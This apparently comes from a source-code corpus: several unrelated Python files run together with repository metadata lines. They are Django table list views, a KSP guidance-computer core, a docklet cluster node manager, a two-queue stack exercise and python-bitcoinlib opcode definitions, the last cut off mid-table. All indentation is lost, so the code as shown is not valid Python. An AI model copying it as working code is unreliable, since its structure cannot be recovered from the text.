togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class WorkListView(GenericListView):
model = Work
table_class = WorkTable
filter_class = WorkListFilter
formhelper_class = WorkFilterFormHelper
init_columns = ['title', 'veroeffentlicht', 'author', 'main_language', 'creation_start_date']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(WorkListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class BookListView(GenericListView):
model = Book
table_class = BookTable
filter_class = BookListFilter
formhelper_class = BookFilterFormHelper
init_columns = ['title', 'bookauthor', 'publication_year']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(BookListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class PersonListView(GenericListView):
model = Person
table_class = PersonTable
filter_class = PersonListFilter
formhelper_class = PersonFilterFormHelper
init_columns = ['first_name', 'last_name', 'person_gnd']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(PersonListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class SpeakerListView(GenericListView):
model = Speaker
table_class = SpeakerTable
filter_class = SpeakerListFilter
formhelper_class = SpeakerFilterFormHelper
init_columns = ['name', 'definition', 'alt_name', 'related_works']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(SpeakerListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
| mit | -3,883,044,588,713,250,000 | 38.437318 | 97 | 0.64922 | false |
mwhagedorn/basaGC | basagc/computer.py | 1 | 11894 | #!/usr/bin/env python2
# -*- coding: UTF-8 -*-
"""This file contains the guts of the guidance computer"""
# This file is part of basaGC (https://github.com/cashelcomputers/basaGC),
# copyright 2014 Tim Buchanan, cashelcomputers (at) gmail.com
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
# Includes code and images from the Virtual AGC Project
# (http://www.ibiblio.org/apollo/index.html) by Ronald S. Burkey
# <[email protected]>
import wx
import burn
import config
import utils
import dsky
import verbs
import nouns
import programs
from telemachus import check_connection, get_telemetry
import telemachus
class Computer(object):
""" This object models the core of the guidance computer.
"""
def __init__(self, gui):
""" Class constructor.
:param gui: the wxPython frame object
:return: None
"""
utils.log(message="\n\n" + config.SHORT_LICENCE + "\n", log_level="INFO")
self.gui = gui
self.dsky = dsky.DSKY(self.gui, self)
self.loop_timer = wx.Timer(gui)
gui.Bind(wx.EVT_TIMER, self.main_loop, self.loop_timer)
self.is_powered_on = False
self.main_loop_table = []
self.gui.Bind(wx.EVT_CLOSE, self.quit)
self.alarm_codes = [0, 0, 0]
self.running_program = None
self.noun_data = {
"30": [],
}
self.next_burn = None
self._burn_queue = []
self.is_ksp_connected = None
self.ksp_paused_state = None
self.is_direction_autopilot_engaged = False
self.is_thrust_autopilot_engaged = False
self.moi_burn_delta_v = 0.0 # a bit of a hack, need to rethink this
burn.gc = self
telemachus.gc = self
verbs.gc = self
verbs.dsky = self.dsky
verbs.frame = self.gui
nouns.gc = self
nouns.dsky = self.dsky
nouns.frame = self.gui
programs.gc = self
programs.dsky = self.dsky
self.nouns = nouns.nouns
self.verbs = verbs.verbs
self.programs = programs.programs
self.option_codes = {
"00001": "",
"00002": "",
"00003": "",
"00004": "",
"00007": "",
"00024": "",
}
self.on()
def add_burn_to_queue(self, burn_object, execute=True):
""" Adds a Burn object to the computer burn queue. If no burn is assigned to next_burn, load new burn to
next_burn
:param burn_object: a Burn object that contains parameters for the burn
:param execute: if true, execute the added burn
:return: None
"""
self._burn_queue.append(burn_object)
if not self.next_burn:
self.next_burn = self._burn_queue.pop()
if execute:
self.next_burn.execute()
def remove_burn(self, this_burn):
""" Removes a given Burn object from the computers burn queue
:param this_burn: the Burn object to remove
:return: None
"""
if this_burn == self.next_burn:
self.next_burn = None
if this_burn in self._burn_queue:
self._burn_queue.remove(this_burn)
def burn_complete(self):
""" Removes a completed burn and loads next queued burn if available.
:return: None
"""
utils.log("Removing {} from burn queue".format(self.next_burn))
self.next_burn = None
if self._burn_queue:
utils.log("Adding {} as next burn".format(self._burn_queue[0]))
self.next_burn = self._burn_queue.pop()
def disable_direction_autopilot(self):
""" Disables the directional autopilot
:return: None
"""
telemachus.disable_smartass()
self.is_direction_autopilot_engaged = False
utils.log("Autopilot disabled", log_level="INFO")
def quit(self, event=None):
""" Quits basaGC.
:param event: wxPython event (not used)
:return: None
"""
# disables SMARTASS
try:
telemachus.disable_smartass()
except TypeError:
pass
# if self.loop_timer.is_running:
# self.loop_timer.stop()
self.gui.Destroy()
def on(self):
""" Turns the guidance computer on.
:return: None
"""
utils.log("Computer booting...", log_level="INFO")
# attempt to load telemetry listing
try:
telemachus.telemetry = telemachus.get_api_listing()
except telemachus.KSPNotConnected:
utils.log("Cannot retrieve telemetry listing - no connection to KSP", log_level="WARNING")
self.dsky.annunciators["no_att"].on()
else:
utils.log("Retrieved telemetry listing", log_level="INFO")
self.loop_timer.Start(config.LOOP_TIMER_INTERVAL)
self.is_powered_on = True
for display_item in self.dsky.static_display:
display_item.on()
def main_loop(self, event):
""" The guidance computer main loop.
:return: None
"""
# Check if we have a connection to KSP
self.check_ksp_connection()
# check KSP paused state
self.check_paused_state()
# if self.run_average_g_routine:
# routines.average_g()
for item in self.main_loop_table:
item()
def go_to_poo(self):
""" Executes program 00. Name comes from NASA documentation :)
:return: None
"""
poo = self.programs["00"]()
poo.execute()
def execute_verb(self, verb, noun=None, **kwargs):
""" Executes the specified verb, optionally with the specified noun.
:param verb: The verb to execute
:param noun: The noun to supply to the verb
:return: None
"""
if noun is not None:
self.dsky.set_noun(noun)
verb = str(verb)
noun = str(noun)
self.dsky.control_registers["verb"].display(verb)
if int(verb) < 40:
verb_to_execute = self.verbs[verb](noun)
else:
verb_to_execute = self.verbs[verb]()
verb_to_execute.execute(**kwargs)
def reset_alarm_codes(self):
""" Resets the alarm codes.
:return: None
"""
self.alarm_codes[2] = self.alarm_codes[0]
self.alarm_codes[0] = 0
self.alarm_codes[1] = 0
def program_alarm(self, alarm_code):
""" Sets the program alarm codes in memory and turns the PROG annunciator on.
:param alarm_code: a 3 or 4 digit octal int of the alarm code to raise
:return: None
"""
utils.log("PROGRAM ALARM {}: {}".format(str(alarm_code), config.ALARM_CODES[alarm_code]), log_level="ERROR")
alarm_code += 1000
if self.alarm_codes[0] != 0:
self.alarm_codes[1] = self.alarm_codes[0]
self.alarm_codes[0] = alarm_code
self.alarm_codes[2] = self.alarm_codes[0]
self.dsky.annunciators["prog"].on()
def poodoo_abort(self, alarm_code):
""" Terminates the faulty program, and executes Program 00 (P00)
:param alarm_code: a 3 digit octal int of the alarm code to raise
:return: None
"""
alarm_message = config.ALARM_CODES[alarm_code]
alarm_code += 2000
if self.alarm_codes[0] != 0:
self.alarm_codes[1] = self.alarm_codes[0]
self.alarm_codes[0] = alarm_code
self.alarm_codes[2] = self.alarm_codes[0]
self.dsky.annunciators["prog"].on()
try:
self.running_program[-1].terminate()
except programs.ProgramTerminated:
# this should happen if the program terminated successfully
utils.log("P00DOO ABORT {}: {}".format(str(alarm_code), alarm_message), log_level="ERROR")
poo = self.programs["00"]()
poo.execute()
def program_restart(self, alarm_code, message=None):
""" Triggers a program restart.
:param alarm_code: a 3 or 4 digit octal int of the alarm code to raise
:param message: optional message to print to log
:return: None
"""
# TODO: insert terminate and restart program
utils.log("Program fresh start not implemented yet... watch this space...")
if message:
utils.log(message, log_level="ERROR")
def computer_restart(self, alarm_code, message=None):
""" Triggers a guidance computer hardware restart. The most severe of the errors!
:param alarm_code: a 3 or 4 digit octal int of the alarm code to raise
:param message: optional message to print to log
:return: None
"""
# insert computer reboot
# self.fresh_start()
if message:
utils.log(message, log_level="CRITICAL")
pass
def servicer(self):
""" For future use. The servicer updates the spacecrafts state vector.
"""
pass
def check_ksp_connection(self):
""" checks if we have a connection to Telemachus / KSP
:return: None
"""
if not check_connection():
if self.is_ksp_connected:
# we have just lost the connection, illuminate NO ATT annunciator and log it
self.dsky.annunciators["no_att"].on()
utils.log("No connection to KSP, navigation functions unavailable", log_level="ERROR")
self.is_ksp_connected = False
else:
if not self.is_ksp_connected:
# have just regained connection, deluminate NO ATT annunciator and log it
self.dsky.annunciators["no_att"].off()
utils.log("Connection to KSP established", log_level="INFO")
self.is_ksp_connected = True
if not telemachus.telemetry:
telemachus.get_api_listing()
def check_paused_state(self):
""" Checks the paused state of KSP, and illuminates STBY annunciator and logs state as necessary.
:return: None
"""
if self.is_ksp_connected:
paused_state = get_telemetry("paused")
# if the paused state hasn't changed, skip any annunciator changes
if paused_state != self.ksp_paused_state:
if paused_state == 0:
self.dsky.annunciators["stby"].off()
utils.log("KSP unpaused, all systems go", log_level="INFO")
elif paused_state == 1:
self.dsky.annunciators["stby"].on()
utils.log("KSP paused", log_level="INFO")
elif paused_state == 2:
self.dsky.annunciators["stby"].on()
utils.log("No power to Telemachus antenna", log_level="WARNING")
elif paused_state == 3:
self.dsky.annunciators["stby"].on()
utils.log("Telemachus antenna off", log_level="WARNING")
elif paused_state == 4:
self.dsky.annunciators["stby"].on()
utils.log("No Telemachus antenna found", log_level="WARNING")
self.ksp_paused_state = paused_state
| gpl-2.0 | 8,683,317,448,400,047,000 | 32.223464 | 116 | 0.583656 | false |
scorpionis/docklet | src/nodemgr.py | 1 | 6883 | #!/usr/bin/python3
import threading, random, time, xmlrpc.client, sys
#import network
from nettools import netcontrol
from log import logger
import env
##########################################
# NodeMgr
# Description : manage the physical nodes
# 1. list running nodes now
# 2. update node list when new node joins
# ETCD table :
# machines/allnodes -- all nodes in docklet, for recovery
# machines/runnodes -- run nodes of this start up
##############################################
class NodeMgr(object):
def __init__(self, networkmgr, etcdclient, addr, mode):
self.addr = addr
logger.info ("begin initialize on %s" % self.addr)
self.networkmgr = networkmgr
self.etcd = etcdclient
self.mode = mode
self.workerport = env.getenv('WORKER_PORT')
# initialize the network
logger.info ("initialize network")
# 'docklet-br' not need ip address. Because every user has gateway
#[status, result] = self.networkmgr.acquire_sysips_cidr()
#self.networkmgr.printpools()
#if not status:
# logger.info ("initialize network failed, no IP for system bridge")
# sys.exit(1)
#self.bridgeip = result[0]
#logger.info ("initialize bridge wih ip %s" % self.bridgeip)
#network.netsetup("init", self.bridgeip)
if self.mode == 'new':
if netcontrol.bridge_exists('docklet-br'):
netcontrol.del_bridge('docklet-br')
netcontrol.new_bridge('docklet-br')
else:
if not netcontrol.bridge_exists('docklet-br'):
logger.error("docklet-br not found")
sys.exit(1)
# init rpc list
self.rpcs = []
# get allnodes
# used in recovery mode, find alll the lost running nodes
self.allnodes = self._nodelist_etcd("allnodes")
self.runnodes = []
[status, runlist] = self.etcd.listdir("machines/runnodes")
for node in runlist:
nodeip = node['key'].rsplit('/',1)[1]
if node['value'] == 'ok':
logger.info ("running node %s" % nodeip)
self.runnodes.append(nodeip)
self.rpcs.append(xmlrpc.client.ServerProxy("http://%s:%s" % (nodeip, self.workerport)))
logger.info ("add %s:%s in rpc client list" % (nodeip, self.workerport))
logger.info ("all nodes are: %s" % self.allnodes)
logger.info ("run nodes are: %s" % self.runnodes)
# start new thread to watch whether a new node joins
logger.info ("start thread to watch new nodes ...")
self.thread_watchnewnode = threading.Thread(target=self._watchnewnode)
self.thread_watchnewnode.start()
# wait for all nodes joins
while(True):
allin = True
for node in self.allnodes:
if node not in self.runnodes:
allin = False
break
if allin:
logger.info("all nodes necessary joins ...")
break
time.sleep(0.05)
logger.info ("run nodes are: %s" % self.runnodes)
# get nodes list from etcd table
def _nodelist_etcd(self, which):
if which == "allnodes" or which == "runnodes":
[status, nodeinfo]=self.etcd.listdir("machines/"+which)
if status:
nodelist = []
for node in nodeinfo:
nodelist.append(node["key"].rsplit('/', 1)[1])
return nodelist
return []
# thread target : watch whether a new node joins
def _watchnewnode(self):
while(True):
time.sleep(0.1)
[status, runlist] = self.etcd.listdir("machines/runnodes")
if not status:
logger.warning ("get runnodes list failed from etcd ")
continue
for node in runlist:
nodeip = node['key'].rsplit('/',1)[1]
if node['value']=='waiting':
# waiting state can be deleted, there is no use to let master check
# this state because worker will change it and master will not change it now.
# it is only preserved for compatible.
logger.info ("%s want to joins, call it to init first" % nodeip)
elif node['value']=='work':
logger.info ("new node %s joins" % nodeip)
# setup GRE tunnels for new nodes
if self.addr == nodeip:
logger.debug ("worker start on master node. not need to setup GRE")
else:
logger.debug ("setup GRE for %s" % nodeip)
if netcontrol.gre_exists('docklet-br', nodeip):
logger.debug("GRE for %s already exists, reuse it" % nodeip)
else:
netcontrol.setup_gre('docklet-br', nodeip)
self.etcd.setkey("machines/runnodes/"+nodeip, "ok")
if nodeip not in self.runnodes:
self.runnodes.append(nodeip)
# node not in all node list is a new node.
if nodeip not in self.allnodes:
self.allnodes.append(nodeip)
self.etcd.setkey("machines/allnodes/"+nodeip, "ok")
logger.debug ("all nodes are: %s" % self.allnodes)
logger.debug ("run nodes are: %s" % self.runnodes)
self.rpcs.append(xmlrpc.client.ServerProxy("http://%s:%s"
% (nodeip, self.workerport)))
logger.info ("add %s:%s in rpc client list" %
(nodeip, self.workerport))
# add machine to the scheduler
import dscheduler
[status,total_cpus] = self.etcd.getkey("cpus/"+nodeip)
[status,total_mems] = self.etcd.getkey("mems/"+nodeip)
logger.info("add machine %s to scheduler, cpus: %s, mems: %s",nodeip, total_cpus, total_mems)
dscheduler.add_machine(nodeip,total_cpus,total_mems)
# get all run nodes' IP addr
def get_nodeips(self):
return self.allnodes
def get_rpcs(self):
return self.rpcs
def get_onerpc(self):
return self.rpcs[random.randint(0, len(self.rpcs)-1)]
def rpc_to_ip(self, rpcclient):
return self.runnodes[self.rpcs.index(rpcclient)]
def ip_to_rpc(self, nodeip):
return self.rpcs[self.runnodes.index(nodeip)]
def get_allnodes(self):
return self.allnodes
| bsd-3-clause | -1,103,196,115,511,232,800 | 41.487654 | 117 | 0.527241 | false |
jasonleaster/Algorithm | Stack/Python_version/stack_by_two_queue.py | 1 | 1379 | class Stack():
def __init__(self, arg = []):
self.Q1 = arg
self.Q2 = []
def stack_empty(self):
if len(self.Q1) == 0 and len(self.Q2) == 0:
return True
else:
return False
def push(self, x):
if self.stack_empty() is True:
self.Q1.append(x)
elif len(self.Q1) != 0:
self.Q1.append(x)
else:
self.Q2.append(x)
def pop(self):
val = None
if self.stack_empty() == True:
print "underflow"
elif len(self.Q1) != 0:
while len(self.Q1) != 0:
if len(self.Q1) == 1:
val = self.Q1[0]
else:
self.Q2.append(self.Q1[0])
self.Q1.remove(self.Q1[0])
else:
while len(self.Q2) != 0:
if len(self.Q2) == 1:
val = self.Q2[0]
else:
self.Q1.append(self.Q2[0])
self.Q2.remove(self.Q2[0])
return val
def show_stack(self):
print "Queue 1 :", self.Q1
print "Queue 2 :", self.Q2
#-----------------------
input_num = ['a', 'b', 'c']
stk = Stack(input_num)
stk.pop()
stk.show_stack()
stk.pop()
stk.show_stack()
stk.push('d')
stk.show_stack()
stk.pop()
stk.show_stack()
| gpl-2.0 | 7,906,497,586,329,862,000 | 20.546875 | 51 | 0.423495 | false |
petertodd/replace-by-fee-tools | lib/python-bitcoinlib/bitcoin/core/script.py | 1 | 34644 | # Copyright (C) 2012-2015 The python-bitcoinlib developers
#
# This file is part of python-bitcoinlib.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of python-bitcoinlib, including this file, may be copied, modified,
# propagated, or distributed except according to the terms contained in the
# LICENSE file.
"""Scripts
Functionality to build scripts, as well as SignatureHash(). Script evaluation
is in bitcoin.core.scripteval
"""
from __future__ import absolute_import, division, print_function
import sys
_bchr = chr
_bord = ord
if sys.version > '3':
long = int
_bchr = lambda x: bytes([x])
_bord = lambda x: x
from io import BytesIO as _BytesIO
else:
from cStringIO import StringIO as _BytesIO
import struct
import bitcoin.core
import bitcoin.core._bignum
from .serialize import *
MAX_SCRIPT_SIZE = 10000
MAX_SCRIPT_ELEMENT_SIZE = 520
MAX_SCRIPT_OPCODES = 201
OPCODE_NAMES = {}
_opcode_instances = []
class CScriptOp(int):
"""A single script opcode"""
__slots__ = []
@staticmethod
def encode_op_pushdata(d):
"""Encode a PUSHDATA op, returning bytes"""
if len(d) < 0x4c:
return b'' + _bchr(len(d)) + d # OP_PUSHDATA
elif len(d) <= 0xff:
return b'\x4c' + _bchr(len(d)) + d # OP_PUSHDATA1
elif len(d) <= 0xffff:
return b'\x4d' + struct.pack(b'<H', len(d)) + d # OP_PUSHDATA2
elif len(d) <= 0xffffffff:
return b'\x4e' + struct.pack(b'<I', len(d)) + d # OP_PUSHDATA4
else:
raise ValueError("Data too long to encode in a PUSHDATA op")
@staticmethod
def encode_op_n(n):
"""Encode a small integer op, returning an opcode"""
if not (0 <= n <= 16):
raise ValueError('Integer must be in range 0 <= n <= 16, got %d' % n)
if n == 0:
return OP_0
else:
return CScriptOp(OP_1 + n-1)
def decode_op_n(self):
"""Decode a small integer opcode, returning an integer"""
if self == OP_0:
return 0
if not (self == OP_0 or OP_1 <= self <= OP_16):
raise ValueError('op %r is not an OP_N' % self)
return int(self - OP_1+1)
def is_small_int(self):
"""Return true if the op pushes a small integer to the stack"""
if 0x51 <= self <= 0x60 or self == 0:
return True
else:
return False
def __str__(self):
return repr(self)
def __repr__(self):
if self in OPCODE_NAMES:
return OPCODE_NAMES[self]
else:
return 'CScriptOp(0x%x)' % self
def __new__(cls, n):
try:
return _opcode_instances[n]
except IndexError:
assert len(_opcode_instances) == n
_opcode_instances.append(super(CScriptOp, cls).__new__(cls, n))
return _opcode_instances[n]
# Populate opcode instance table
for n in range(0xff+1):
CScriptOp(n)
# push value
OP_0 = CScriptOp(0x00)
OP_FALSE = OP_0
OP_PUSHDATA1 = CScriptOp(0x4c)
OP_PUSHDATA2 = CScriptOp(0x4d)
OP_PUSHDATA4 = CScriptOp(0x4e)
OP_1NEGATE = CScriptOp(0x4f)
OP_RESERVED = CScriptOp(0x50)
OP_1 = CScriptOp(0x51)
OP_TRUE = OP_1
OP_2 = CScriptOp(0x52)
OP_3 = CScriptOp(0x53)
OP_4 = CScriptOp(0x54)
OP_5 = CScriptOp(0x55)
OP_6 = CScriptOp(0x56)
OP_7 = CScriptOp(0x57)
OP_8 = CScriptOp(0x58)
OP_9 = CScriptOp(0x59)
OP_10 = CScriptOp(0x5a)
OP_11 = CScriptOp(0x5b)
OP_12 = CScriptOp(0x5c)
OP_13 = CScriptOp(0x5d)
OP_14 = CScriptOp(0x5e)
OP_15 = CScriptOp(0x5f)
OP_16 = CScriptOp(0x60)
# control
OP_NOP = CScriptOp(0x61)
OP_VER = CScriptOp(0x62)
OP_IF = CScriptOp(0x63)
OP_NOTIF = CScriptOp(0x64)
OP_VERIF = CScriptOp(0x65)
OP_VERNOTIF = CScriptOp(0x66)
OP_ELSE = CScriptOp(0x67)
OP_ENDIF = CScriptOp(0x68)
OP_VERIFY = CScriptOp(0x69)
OP_RETURN = CScriptOp(0x6a)
# stack ops
OP_TOALTSTACK = CScriptOp(0x6b)
OP_FROMALTSTACK = CScriptOp(0x6c)
OP_2DROP = CScriptOp(0x6d)
OP_2DUP = CScriptOp(0x6e)
OP_3DUP = CScriptOp(0x6f)
OP_2OVER = CScriptOp(0x70)
OP_2ROT = CScriptOp(0x71)
OP_2SWAP = CScriptOp(0x72)
OP_IFDUP = CScriptOp(0x73)
OP_DEPTH = CScriptOp(0x74)
OP_DROP = CScriptOp(0x75)
OP_DUP = CScriptOp(0x76)
OP_NIP = CScriptOp(0x77)
OP_OVER = CScriptOp(0x78)
OP_PICK = CScriptOp(0x79)
OP_ROLL = CScriptOp(0x7a)
OP_ROT = CScriptOp(0x7b)
OP_SWAP = CScriptOp(0x7c)
OP_TUCK = CScriptOp(0x7d)
# splice ops
OP_CAT = CScriptOp(0x7e)
OP_SUBSTR = CScriptOp(0x7f)
OP_LEFT = CScriptOp(0x80)
OP_RIGHT = CScriptOp(0x81)
OP_SIZE = CScriptOp(0x82)
# bit logic
OP_INVERT = CScriptOp(0x83)
OP_AND = CScriptOp(0x84)
OP_OR = CScriptOp(0x85)
OP_XOR = CScriptOp(0x86)
OP_EQUAL = CScriptOp(0x87)
OP_EQUALVERIFY = CScriptOp(0x88)
OP_RESERVED1 = CScriptOp(0x89)
OP_RESERVED2 = CScriptOp(0x8a)
# numeric
OP_1ADD = CScriptOp(0x8b)
OP_1SUB = CScriptOp(0x8c)
OP_2MUL = CScriptOp(0x8d)
OP_2DIV = CScriptOp(0x8e)
OP_NEGATE = CScriptOp(0x8f)
OP_ABS = CScriptOp(0x90)
OP_NOT = CScriptOp(0x91)
OP_0NOTEQUAL = CScriptOp(0x92)
OP_ADD = CScriptOp(0x93)
OP_SUB = CScriptOp(0x94)
OP_MUL = CScriptOp(0x95)
OP_DIV = CScriptOp(0x96)
OP_MOD = CScriptOp(0x97)
OP_LSHIFT = CScriptOp(0x98)
OP_RSHIFT = CScriptOp(0x99)
OP_BOOLAND = CScriptOp(0x9a)
OP_BOOLOR = CScriptOp(0x9b)
OP_NUMEQUAL = CScriptOp(0x9c)
OP_NUMEQUALVERIFY = CScriptOp(0x9d)
OP_NUMNOTEQUAL = CScriptOp(0x9e)
OP_LESSTHAN = CScriptOp(0x9f)
OP_GREATERTHAN = CScriptOp(0xa0)
OP_LESSTHANOREQUAL = CScriptOp(0xa1)
OP_GREATERTHANOREQUAL = CScriptOp(0xa2)
OP_MIN = CScriptOp(0xa3)
OP_MAX = CScriptOp(0xa4)
OP_WITHIN = CScriptOp(0xa5)
# crypto
OP_RIPEMD160 = CScriptOp(0xa6)
OP_SHA1 = CScriptOp(0xa7)
OP_SHA256 = CScriptOp(0xa8)
OP_HASH160 = CScriptOp(0xa9)
OP_HASH256 = CScriptOp(0xaa)
OP_CODESEPARATOR = CScriptOp(0xab)
OP_CHECKSIG = CScriptOp(0xac)
OP_CHECKSIGVERIFY = CScriptOp(0xad)
OP_CHECKMULTISIG = CScriptOp(0xae)
OP_CHECKMULTISIGVERIFY = CScriptOp(0xaf)
# expansion
OP_NOP1 = CScriptOp(0xb0)
OP_NOP2 = CScriptOp(0xb1)
OP_CHECKLOCKTIMEVERIFY = OP_NOP2
OP_NOP3 = CScriptOp(0xb2)
OP_NOP4 = CScriptOp(0xb3)
OP_NOP5 = CScriptOp(0xb4)
OP_NOP6 = CScriptOp(0xb5)
OP_NOP7 = CScriptOp(0xb6)
OP_NOP8 = CScriptOp(0xb7)
OP_NOP9 = CScriptOp(0xb8)
OP_NOP10 = CScriptOp(0xb9)
# template matching params
OP_SMALLINTEGER = CScriptOp(0xfa)
OP_PUBKEYS = CScriptOp(0xfb)
OP_PUBKEYHASH = CScriptOp(0xfd)
OP_PUBKEY = CScriptOp(0xfe)
OP_INVALIDOPCODE = CScriptOp(0xff)
OPCODE_NAMES.update({
OP_0: 'OP_0',
OP_PUSHDATA1: 'OP_PUSHDATA1',
OP_PUSHDATA2: 'OP_PUSHDATA2',
OP_PUSHDATA4: 'OP_PUSHDATA4',
OP_1NEGATE: 'OP_1NEGATE',
OP_RESERVED: 'OP_RESERVED',
OP_1: 'OP_1',
OP_2: 'OP_2',
OP_3: 'OP_3',
OP_4: 'OP_4',
OP_5: 'OP_5',
OP_6: 'OP_6',
OP_7: 'OP_7',
OP_8: 'OP_8',
OP_9: 'OP_9',
OP_10: 'OP_10',
OP_11: 'OP_11',
OP_12: 'OP_12',
OP_13: 'OP_13',
OP_14: 'OP_14',
OP_15: 'OP_15',
OP_16: 'OP_16',
OP_NOP: 'OP_NOP',
OP_VER: 'OP_VER',
OP_IF: 'OP_IF',
OP_NOTIF: 'OP_NOTIF',
OP_VERIF: 'OP_VERIF',
OP_VERNOTIF: 'OP_VERNOTIF',
OP_ELSE: 'OP_ELSE',
OP_ENDIF: 'OP_ENDIF',
OP_VERIFY: 'OP_VERIFY',
OP_RETURN: 'OP_RETURN',
OP_TOALTSTACK: 'OP_TOALTSTACK',
OP_FROMALTSTACK: 'OP_FROMALTSTACK',
OP_2DROP: 'OP_2DROP',
OP_2DUP: 'OP_2DUP',
OP_3DUP: 'OP_3DUP',
OP_2OVER: 'OP_2OVER',
OP_2ROT: 'OP_2ROT',
OP_2SWAP: 'OP_2SWAP',
OP_IFDUP: 'OP_IFDUP',
OP_DEPTH: 'OP_DEPTH',
OP_DROP: 'OP_DROP',
OP_DUP: 'OP_DUP',
OP_NIP: 'OP_NIP',
OP_OVER: 'OP_OVER',
OP_PICK: 'OP_PICK',
OP_ROLL: 'OP_ROLL',
OP_ROT: 'OP_ROT',
OP_SWAP: 'OP_SWAP',
OP_TUCK: 'OP_TUCK',
OP_CAT: 'OP_CAT',
OP_SUBSTR: 'OP_SUBSTR',
OP_LEFT: 'OP_LEFT',
OP_RIGHT: 'OP_RIGHT',
OP_SIZE: 'OP_SIZE',
OP_INVERT: 'OP_INVERT',
OP_AND: 'OP_AND',
OP_OR: 'OP_OR',
OP_XOR: 'OP_XOR',
OP_EQUAL: 'OP_EQUAL',
OP_EQUALVERIFY: 'OP_EQUALVERIFY',
OP_RESERVED1: 'OP_RESERVED1',
OP_RESERVED2: 'OP_RESERVED2',
OP_1ADD: 'OP_1ADD',
OP_1SUB: 'OP_1SUB',
OP_2MUL: 'OP_2MUL',
OP_2DIV: 'OP_2DIV',
OP_NEGATE: 'OP_NEGATE',
OP_ABS: 'OP_ABS',
OP_NOT: 'OP_NOT',
OP_0NOTEQUAL: 'OP_0NOTEQUAL',
OP_ADD: 'OP_ADD',
OP_SUB: 'OP_SUB',
OP_MUL: 'OP_MUL',
OP_DIV: 'OP_DIV',
OP_MOD: 'OP_MOD',
OP_LSHIFT: 'OP_LSHIFT',
OP_RSHIFT: 'OP_RSHIFT',
OP_BOOLAND: 'OP_BOOLAND',
OP_BOOLOR: 'OP_BOOLOR',
OP_NUMEQUAL: 'OP_NUMEQUAL',
OP_NUMEQUALVERIFY: 'OP_NUMEQUALVERIFY',
OP_NUMNOTEQUAL: 'OP_NUMNOTEQUAL',
OP_LESSTHAN: 'OP_LESSTHAN',
OP_GREATERTHAN: 'OP_GREATERTHAN',
OP_LESSTHANOREQUAL: 'OP_LESSTHANOREQUAL',
OP_GREATERTHANOREQUAL: 'OP_GREATERTHANOREQUAL',
OP_MIN: 'OP_MIN',
OP_MAX: 'OP_MAX',
OP_WITHIN: 'OP_WITHIN',
OP_RIPEMD160: 'OP_RIPEMD160',
OP_SHA1: 'OP_SHA1',
OP_SHA256: 'OP_SHA256',
OP_HASH160: 'OP_HASH160',
OP_HASH256: 'OP_HASH256',
OP_CODESEPARATOR: 'OP_CODESEPARATOR',
OP_CHECKSIG: 'OP_CHECKSIG',
OP_CHECKSIGVERIFY: 'OP_CHECKSIGVERIFY',
OP_CHECKMULTISIG: 'OP_CHECKMULTISIG',
OP_CHECKMULTISIGVERIFY: 'OP_CHECKMULTISIGVERIFY',
OP_NOP1: 'OP_NOP1',
OP_NOP2: 'OP_NOP2',
OP_CHECKLOCKTIMEVERIFY: 'OP_CHECKLOCKTIMEVERIFY',
